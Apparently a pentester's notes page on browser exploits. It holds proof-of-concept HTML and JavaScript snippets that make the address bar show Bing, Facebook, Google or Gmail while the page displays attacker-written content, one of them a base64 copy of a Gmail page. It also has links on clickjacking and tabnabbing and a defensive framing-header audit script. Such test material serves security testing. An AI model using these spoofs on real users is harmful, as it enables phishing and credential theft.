Browser Exploits

URL Spoofing

https://github.com/rafaybaloch/SOP-Bypass-Mini-Test-Suite

setInterval href:

    <script>
      document.write("<h1>This is not Bing</h1>");
      location.href = "https://bing.com:8081";
      setInterval(function () { location.href = "https://bing.com:8080"; }, 2000);
    </script>

setInterval location:

    <script>
      function spoof() {
        document.write("<h1>This is not Bing</h1>");
        document.location = "https://bing.com:1234";
        setInterval(function () { document.location = "https://bing.com:1234"; }, 9800);
      }
    </script>
    <p class="test">
      <input class="btn btn-success btn-lg" type="button" value="Run test case" onclick="spoof();" />
    </p>

Stop Window Open:

    <p class="test">
      <input class="btn btn-success btn-lg" type="button" value="Run test case"
             onclick="win = window.open('https://www.facebook.com:8080','WIN');
                      window.open('https://www.bing.com', 'WIN');
                      win.window.stop();
                      win.document.write('This is not Facebook');
                      win.document.close();" />
    </p>

Hidden Schema:

    <h2>Spoof 13</h2>
    <script>
      function pocccc() {
        var w = open('data://google.com');
        w.document.body.innerHTML = 'This is not google';
      }
    </script>
    <p class="test">
      <input class="btn btn-success btn-lg" type="button" value="Run test case" onclick="pocccc();" />
    </p>

location assign:

    <script>
      function spoof() {
        var gmail = 'PCFET0NC8+KArOK........ZHk+PC9odG1sPg=='; // The base64-encoded version of the Gmail page
        x = document.body.innerHTML = atob(gmail);
        document.write("<title>Gmail</title>");
        document.write("x");
        window.location.assign("https://www.gmail.com:8080");
      }
      setInterval(spoof(), 100000);
    </script>

Domain name issues

https://tkte.ch/articles/2024/03/15/parsing-urls-in-python.html

Reverse Tabnabbing

https://www.comparitech.com/blog/information-security/reverse-tabnabbing/

ClickJacking

Clickjacking layers hidden UI elements over a page to trick a user into clicking a button or link on another page when they intended to click on the top-level page.

This can be prevented by using:

  • Content Security Policy: frame-ancestors/frame-src/child-src
  • X-Frame-Options
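
A header audit for the two defences listed above, as an added example that is not part of the original page: it counts only an enforced `frame-ancestors` or a valid `X-Frame-Options` as protection for the framed page, because `frame-src` and `child-src` restrict what a page may embed rather than who may embed it. The function names, verdict labels and sample header values are assumptions made for illustration.

```javascript
// Added example, not from the original page. Header values in SAMPLES are constructed.
function frameAncestors(cspValues) {
  // Comma separates policies, semicolon separates directives; collect each frame-ancestors list.
  const lists = [];
  for (const policy of cspValues.join(',').split(',')) {
    const seen = new Set();
    for (const directive of policy.split(';')) {
      const [name, ...sources] = directive.trim().toLowerCase().split(/\s+/);
      if (!name || seen.has(name)) continue; // first occurrence of a directive wins
      seen.add(name);
      if (name === 'frame-ancestors') lists.push(sources);
    }
  }
  return lists;
}

function auditFraming(headers) {
  const h = {}; // header names are case-insensitive; values may be string or array
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = [].concat(v);
  const findings = [];
  if (frameAncestors(h['content-security-policy-report-only'] || []).length) {
    findings.push('frame-ancestors in a report-only policy does not block framing');
  }
  const xfo = new Set((h['x-frame-options'] || []).join(',').split(',')
    .map(s => s.trim().toUpperCase()).filter(Boolean));
  const xfoValid = xfo.size === 1 && (xfo.has('DENY') || xfo.has('SAMEORIGIN'));
  if (xfo.size && !xfoValid) {
    findings.push('X-Frame-Options is obsolete, unrecognised or conflicting: ' + [...xfo].join(', '));
  }
  const lists = frameAncestors(h['content-security-policy'] || []);
  if (lists.length) {
    // An enforced frame-ancestors makes supporting browsers ignore X-Frame-Options.
    const open = s => /^(\*|[a-z][a-z0-9+.-]*:(\/\/\*)?)$/.test(s);
    if (lists.some(list => !list.some(open))) return { verdict: 'protected', findings };
    findings.push('frame-ancestors allows any origin (wildcard or bare scheme)');
    return { verdict: 'weak', findings };
  }
  if (xfoValid) {
    findings.push('only X-Frame-Options is set; consider adding CSP frame-ancestors');
    return { verdict: 'protected', findings };
  }
  return { verdict: 'unprotected', findings };
}
const SAMPLES = [ // constructed responses
  { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  { 'Content-Security-Policy': 'frame-ancestors *', 'X-Frame-Options': 'DENY' },
  { 'Content-Security-Policy': "frame-src 'none'; child-src 'none'" },
];
for (const s of SAMPLES) console.log(auditFraming(s).verdict, JSON.stringify(s));
```

The second sample reports `weak` even though `X-Frame-Options: DENY` is present, because the enforced wildcard `frame-ancestors` takes precedence in browsers that support it.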

Certificates

https://github.blog/2023-08-17-mtls-when-certificate-authentication-is-done-wrong/

Extensions

https://book.hacktricks.xyz/pentesting-web/browser-extension-pentesting-methodology

URL Renaming

Change the URL shown in the URL bar while the page displays custom HTML:

    <p>
      <button type="button" value="Test Case"
              onclick="win = window.open('https://www.google.com');
                       win.window.stop();
                       win.document.write('<h1>URL Hijacked</h1>');
                       win.document.close()"></button>
    </p>